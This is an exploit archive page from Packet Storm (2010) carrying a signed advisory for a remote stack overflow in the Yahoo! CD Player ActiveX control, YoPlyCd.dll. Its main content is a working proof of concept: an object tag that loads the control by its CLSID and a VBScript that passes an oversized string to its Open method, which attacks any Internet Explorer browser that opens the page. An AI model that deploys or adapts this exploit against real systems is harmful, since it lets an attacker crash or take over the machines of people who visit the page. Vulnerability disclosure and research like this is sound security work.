what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Yahoo CD Player Overflow

Yahoo CD Player Overflow
Posted Apr 20, 2010
Authored by shinnai

Yahoo! CD Player (YoPlyCd.dll) remote stack overflow exploit.

tags | exploit, remote, overflow
SHA-256 | 8a0d6e287e603a846eafe4d909f0383db7eaf2decf49a019977881ffd8347e27

Yahoo CD Player Overflow

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------
Yahoo! CD Player (YoPlyCd.dll) Remote Stack Overflow
url: http//www.yahoo.com

Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.net/

File: YoPlyCd.dll
Ver.: 2000.9.7.1
ProgID: YoPlayer.YoPlyCd.1
Descr.: Yahoo CD Player

Marked: RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: False

Member: Open (other members could be vulnerable too)

This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.

Tested on:
Windows XP Professional SP3 with Internet Explorer 8
Windows 2000 Professional SP4 with Internet Explorer 6
Windows Server 2003 SP2 with Internet Explorer 8
Windows 7 Ultimate with Internet Explorer 8
- --------------------------------------------------------------------

<object classid='clsid:5622772D-6C27-11D3-95E5-006008D14F3B' id='test'></object>

<script language='vbscript'>

buff = String(2097512, "A") '<- EAX changes according to the first parameter of
' "String" function (Number As Long)
test.open buff

</script>


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (MingW32)

iQIcBAEBAgAGBQJLlR+yAAoJEGLxkZuDw5+sHTQP/0cy8nBvHimQxDZ9aNdzCYC1
j1ORCl1+Edx+hjD7nL9CiazZYojLGD5iMIRdXPQXvSmuFjJEfaKiLFtB0z+W+QMj
CA3s7kViXjGnM6QUC6fBqy/K+7IYr4zxbpEM01FxLa95I9iN2NlAAsl+rsJM8ttV
+e+Ky0Uj6SRvELy7rALxKOZbbBEP7WFIuUVH6lLBR7rNo5IlrFurR1nzD5LPn8se
1f3u38F1g4OkLY+EUQy4ZUVu5WAXLbrEZLWtfWx9NSYCQJl0kQPBHo+g2vGtvk4w
Njh0AKTh5cCLwlao3BlgleC2PSAUOvkSzOgDMOpz7IlWG+ybhDXALnt08AiNLdzc
3pX7jhUjVuCaBcWO+rmTE3jKu62tDVgG90GGzELTTA8XUNsOzsPb7Bs18Ghxvpnn
RexlEZaEPPA/Cf/FVy9s6A6g26SwBjYh5JGoFi8H9KhJUEicvG2oiCJ4O0WXVWFy
O/5NbK7lnJgRRa0BxXxE44ISqk/g/0HXTYy9B3S7zv8IePLu6CBCI5A+t+9YPmpT
pxU//IFXwgW/BT5FLkl4LDNsRKaNqCuhqxcPPXC0FrEKx7mbOfi2UW9amJwNqE8s
xI2LRqdPdsGp6zMgzAXXvA8U/vdR/DPoNNarMRj/ssqHHDFayYrfJhFo65La8bEn
498SqmGxsvjADr0HOhbN
=qHnA
-----END PGP SIGNATURE-----

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close